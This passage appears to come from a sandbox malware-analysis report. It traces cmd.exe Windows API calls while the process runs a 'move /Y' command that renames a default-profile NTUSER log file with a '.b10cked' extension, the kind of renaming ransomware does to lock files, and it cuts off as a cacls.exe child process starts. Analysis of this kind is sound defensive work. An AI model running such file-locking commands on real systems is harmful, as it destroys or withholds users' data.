VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.752] GetConsoleOutputCP () returned 0x1b5 [0215.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.752] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.752] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.753] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.753] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.753] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.753] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.753] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.753] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.753] GetEnvironmentStringsW () returned 0x3d0140* [0215.754] FreeEnvironmentStringsW (penv=0x3d0140) returned 1 [0215.754] GetEnvironmentStringsW () returned 0x3d0140* [0215.754] FreeEnvironmentStringsW (penv=0x3d0140) returned 1 [0215.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce74c | out: phkResult=0x1ce74c*=0x40) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0xf0, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x0, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegCloseKey (hKey=0x40) returned 0x0 [0215.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce74c | out: phkResult=0x1ce74c*=0x40) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x0, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegCloseKey (hKey=0x40) returned 0x0 [0215.755] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.755] srand (_Seed=0x5b8863b1) [0215.755] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" [0215.755] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" [0215.755] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.755] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.756] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.756] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.756] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.756] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.756] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.756] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.756] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.756] GetEnvironmentStringsW () returned 0x3d2290* [0215.756] FreeEnvironmentStringsW (penv=0x3d2290) returned 1 [0215.756] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.756] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.756] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.756] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.756] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.757] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf518 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf518, lpFilePart=0x1cf514 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf514*="Desktop") returned 0x18 [0215.757] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.757] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.757] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.757] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.757] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.758] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.758] GetEnvironmentStringsW () returned 0x3d2ab0* [0215.758] FreeEnvironmentStringsW (penv=0x3d2ab0) returned 1 [0215.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.759] GetConsoleOutputCP () returned 0x1b5 [0215.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.759] GetUserDefaultLCID () returned 0x409 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf658, cchData=128 | out: lpLCData="0") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf658, cchData=128 | out: lpLCData="0") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf658, cchData=128 | out: lpLCData="1") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.761] GetConsoleTitleW (in: lpConsoleTitle=0x3c08b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.762] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.762] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.762] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.762] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.765] GetConsoleTitleW (in: lpConsoleTitle=0x1cf350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.765] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.765] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.765] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.765] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.765] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf10c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf104, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf104*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.769] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.769] _wcsicmp (_String1="NTUSER~1.LOG", _String2=".") returned 64 [0215.769] _wcsicmp (_String1="NTUSER~1.LOG", _String2="..") returned 64 [0215.769] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER~1.LOG" (normalized: "c:\\users\\default\\ntuser~1.log")) returned 0x22 [0215.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.770] SetErrorMode (uMode=0x0) returned 0x0 [0215.770] SetErrorMode (uMode=0x1) returned 0x0 [0215.770] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", nBufferLength=0x104, lpBuffer=0x1cea94, lpFilePart=0x1cea7c | out: lpBuffer="C:\\Users\\Default\\NTUSER~1.LOG", lpFilePart=0x1cea7c*="NTUSER~1.LOG") returned 0x1d [0215.770] SetErrorMode (uMode=0x0) returned 0x1 [0215.770] GetFileAttributesW (lpFileName="C:\\Users\\Default" (normalized: "c:\\users\\default")) returned 0x13 [0215.770] _wcsicmp (_String1="NTUSER~1.LOG", _String2=".") returned 64 [0215.770] _wcsicmp (_String1="NTUSER~1.LOG", _String2="..") returned 64 [0215.770] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER~1.LOG" (normalized: "c:\\users\\default\\ntuser~1.log")) returned 0x22 [0215.770] SetErrorMode (uMode=0x0) returned 0x0 [0215.770] SetErrorMode (uMode=0x1) returned 0x0 [0215.770] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", nBufferLength=0x104, lpBuffer=0x1cef10, lpFilePart=0x1ceca8 | out: lpBuffer="C:\\Users\\Default\\NTUSER~1.LOG", lpFilePart=0x1ceca8*="NTUSER~1.LOG") returned 0x1d [0215.770] SetErrorMode (uMode=0x0) returned 0x1 [0215.771] SetErrorMode (uMode=0x0) returned 0x0 [0215.771] SetErrorMode (uMode=0x1) returned 0x0 [0215.771] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked", nBufferLength=0x104, lpBuffer=0x1cf118, lpFilePart=0x1ceca8 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked", lpFilePart=0x1ceca8*="NTUSER.DAT.LOG1.b10cked") returned 0x28 [0215.771] SetErrorMode (uMode=0x0) returned 0x1 [0215.771] SetLastError (dwErrCode=0x0) [0215.771] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked" (normalized: "c:\\users\\default\\ntuser.dat.log1.b10cked")) returned 0xffffffff [0215.771] GetLastError () returned 0x2 [0215.771] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x1ce624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce624) returned 0x3d2188 [0215.771] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x1ce624 | out: lpFindFileData=0x1ce624) returned 0 [0215.772] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.772] GetLastError () returned 0x12 [0215.772] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x1ce624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce624) returned 0x3d2188 [0215.772] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x1ce624 | out: lpFindFileData=0x1ce624) returned 0 [0215.772] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.772] GetLastError () returned 0x12 [0215.816] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x3d1ab8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1ab8) returned 0x3d2188 [0215.816] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x3d1ab8 | out: lpFindFileData=0x3d1ab8) returned 0 [0215.816] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.816] GetLastError () returned 0x12 [0215.816] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x3d1ab8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1ab8) returned 0x3d2188 [0215.816] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x3d1ab8 | out: lpFindFileData=0x3d1ab8) returned 0 [0215.816] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.816] GetLastError () returned 0x12 [0215.816] _get_osfhandle (_FileHandle=2) returned 0xb [0215.816] GetFileType (hFile=0xb) returned 0x2 [0215.817] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0215.817] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ce7f4 | out: lpMode=0x1ce7f4) returned 1 [0215.817] _get_osfhandle (_FileHandle=2) returned 0xb [0215.817] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ce828 | out: lpConsoleScreenBufferInfo=0x1ce828) returned 1 [0215.817] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0215.818] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce868 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0215.819] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ce84c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce84c*=0x2c) returned 1 [0215.819] longjmp () [0215.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.819] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.819] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.819] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.820] SetConsoleInputExeNameW () returned 0x1 [0215.820] GetConsoleOutputCP () returned 0x1b5 [0215.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.820] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.820] exit (_Code=1) Process: id = "544" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16cc0" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "542" os_parent_pid = "0xb28" cmd_line = "CACLS 